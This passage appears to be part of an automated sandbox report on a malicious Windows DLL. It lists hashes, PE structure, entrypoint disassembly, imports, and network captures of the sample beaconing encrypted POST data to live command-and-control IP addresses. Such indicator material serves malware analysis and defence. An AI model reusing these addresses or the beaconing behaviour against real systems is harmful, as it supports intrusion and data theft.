                                                                                                      SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                      • 192.46.210.220

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                                                                                      Category:dropped
                                                                                                      Size (bytes):61157
                                                                                                      Entropy (8bit):7.995991509218449
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                                                                                      MD5:AB5C36D10261C173C5896F3478CDC6B7
                                                                                                      SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                                                                                      SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                                                                                      SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.
                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):326
                                                                                                      Entropy (8bit):3.108423439276625
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:kKdjOdFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:pg2kPlE99SNxAhUefit
                                                                                                      MD5:E66FF5BA4EFD24F9FB241ADEEBFFCED5
                                                                                                      SHA1:7F1B57D2AEAA051405987A55C4E4A720E31B7875
                                                                                                      SHA-256:ACD77DBD6ABD455C0DF9AA888F6C460BC2DB991FABB31D45EFC72177A6A652F0
                                                                                                      SHA-512:231851698264F234D485412E5C62B5DB1FE9F25F4D25DE3025A7BCB4126EC4E4F55026BAE0F64D9CB36624ED058E04A42F90DEBC51E1422F4D16B300E7708226
                                                                                                      Malicious:false
                                                                                                      Preview: p...... ........Y..>....(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):6.439756820157215
                                                                                                      TrID:
                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:SecuriteInfo.com.Variant.Razy.980776.5008.dll
                                                                                                      File size:1375232
                                                                                                      MD5:7f1dd5795783f0793caec052daae5b4e
                                                                                                      SHA1:7ffda23921e29ba6ecd911cfe4ccaaba6b8832ca
                                                                                                      SHA256:ef94fa9978503a9a126e4f15296c130e039e67636a55acb5b10778e09ee0d1d3
                                                                                                      SHA512:d35720f52199ee70669b1e697457ae5495aad022dfbcda41596e7d0a92968ec8eb7ef08680bcfeb079c473c1be3b2a0c2c552a7d2edeec8801e96244123a29fe
                                                                                                      SSDEEP:24576:NnxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu7B:Ncfk82uAJTI79PswKwuC
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L..."..."...".Y"...."......."... ..."...'..."...!..."...$...".Y"...."...#..."...-.k."...#..."......."...!...".Rich.."........

                                                                                                      File Icon

                                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x4336b0
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x5BBD2F46 [Tue Oct 9 22:44:22 2018 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:6
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:ccbe70d6d0d02f6248ca160d6a0bb85b

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      cmp dword ptr [ebp+0Ch], 01h
                                                                                                      jne 00007F8C10AEDF27h
                                                                                                      call 00007F8C10AEEC57h
                                                                                                      mov eax, dword ptr [ebp+10h]
                                                                                                      push eax
                                                                                                      mov ecx, dword ptr [ebp+0Ch]
                                                                                                      push ecx
                                                                                                      mov edx, dword ptr [ebp+08h]
                                                                                                      push edx
                                                                                                      call 00007F8C10AEDD16h
                                                                                                      add esp, 0Ch
                                                                                                      pop ebp
                                                                                                      retn 000Ch
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [0054806Ch]
                                                                                                      xor edx, edx
                                                                                                      mov ecx, 00000020h
                                                                                                      div ecx
                                                                                                      push edx
                                                                                                      mov edx, dword ptr [ebp+08h]
                                                                                                      xor edx, dword ptr [0054806Ch]
                                                                                                      push edx
                                                                                                      call 00007F8C10AEDF64h
                                                                                                      add esp, 08h
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [0054806Ch]
                                                                                                      xor edx, edx
                                                                                                      mov ecx, 00000020h
                                                                                                      div ecx
                                                                                                      mov eax, 00000020h
                                                                                                      sub eax, edx
                                                                                                      push eax
                                                                                                      mov ecx, dword ptr [ebp+08h]
                                                                                                      push ecx
                                                                                                      call 00007F8C10AEDF33h
                                                                                                      add esp, 08h
                                                                                                      xor eax, dword ptr [0054806Ch]
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                      mov ecx, dword ptr [ebp+0Ch]
                                                                                                      ror eax, cl
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      call 00007F8C10AEF2BDh
                                                                                                      push eax
                                                                                                      call 00007F8C10B2FFC7h
                                                                                                      add esp, 04h
                                                                                                      pop ebp
                                                                                                      ret
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      sub esp, 18h
                                                                                                      mov eax, dword ptr [ebp+00h]

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x1471900x6c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1471fc0x28.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000x72b4.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1431100x54.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1431680x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xc70000x184.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000xc5e2f0xc6000False0.442064689867data6.47812387605IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0xc70000x80aec0x80c00False0.534103837985data5.52050689399IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x1480000x13ba00x1800False0.1875DOS executable (block device driverpyright)3.99635070896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x15c0000x72b40x7400False0.710264008621data6.69742088731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllGetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

                                                                                                      Exports

                                                                                                      NameOrdinalAddress
                                                                                                      Bluewing10x49eed0
                                                                                                      Earth20x49efd0
                                                                                                      Masterjust30x49eb20

                                                                                                      Network Behavior

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 28, 2021 05:06:58.434027910 CEST49760443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:06:58.434092999 CEST44349760192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:06:58.434205055 CEST49760443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:06:58.470122099 CEST49760443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:06:58.470170975 CEST44349760192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:06:58.995625019 CEST44349760192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:06:58.995753050 CEST49760443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:06:59.300796986 CEST49760443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:06:59.300829887 CEST44349760192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:06:59.301260948 CEST44349760192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:06:59.301346064 CEST49760443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:06:59.303648949 CEST49760443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:06:59.303740978 CEST49760443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:06:59.303814888 CEST44349760192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:07:00.014672041 CEST44349760192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:07:00.014787912 CEST49760443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:00.014820099 CEST44349760192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:07:00.014847040 CEST44349760192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:07:00.014874935 CEST49760443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:00.014909029 CEST49760443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:00.026557922 CEST49760443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:00.026595116 CEST44349760192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:07:00.127037048 CEST49772443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:00.127101898 CEST44349772192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:07:00.127199888 CEST49772443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:00.141331911 CEST49772443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:00.141366005 CEST44349772192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:07:00.196429968 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:00.356565952 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:00.356698990 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:00.357253075 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:00.516707897 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:00.518151045 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:00.518260956 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:00.630122900 CEST44349772192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:07:00.630261898 CEST49772443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:00.870897055 CEST49772443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:00.870939016 CEST44349772192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:07:00.871490002 CEST44349772192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:07:00.871577978 CEST49772443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:00.874234915 CEST49772443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:00.874321938 CEST49772443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:00.874437094 CEST44349772192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:07:01.563344955 CEST44349772192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:07:01.563417912 CEST44349772192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:07:01.563483953 CEST49772443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:01.563528061 CEST49772443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:01.568696022 CEST49772443192.168.2.4192.46.210.220
                                                                                                      Oct 28, 2021 05:07:01.568753958 CEST44349772192.46.210.220192.168.2.4
                                                                                                      Oct 28, 2021 05:07:01.759357929 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:01.930303097 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:01.930404902 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:01.932159901 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.067646980 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.102927923 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.104401112 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.104499102 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.227190018 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.227596998 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.227677107 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.228887081 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.229340076 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.307152987 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.388307095 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.388664007 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.388684988 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.478176117 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.478512049 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.478688002 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.484776974 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.484895945 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.655751944 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.655782938 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.655800104 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.774800062 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.774821997 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:02.774951935 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.783175945 CEST49773808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:02.942833900 CEST80849773143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.040132999 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.040165901 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.040349960 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:03.058553934 CEST49784808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:07:03.185879946 CEST497896891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.229751110 CEST80849784143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.261830091 CEST497906891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.352541924 CEST68914978945.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.352672100 CEST497896891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.353493929 CEST497896891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.427376986 CEST68914979045.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.429028034 CEST497906891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.430043936 CEST497906891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.520014048 CEST68914978945.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.520976067 CEST68914978945.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.521039009 CEST497896891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.529103994 CEST497896891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.595565081 CEST68914979045.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.596302032 CEST68914979045.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:07:03.596414089 CEST497906891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:07:03.603799105 CEST497906891192.168.2.445.77.0.96

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • 192.46.210.220

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.449760192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:06:59 UTC0OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:06:59 UTC0OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:00 UTC4INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:06:59 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      1192.168.2.449772192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:00 UTC4OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:00 UTC5OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:01 UTC9INHTTP/1.1 403 Forbidden
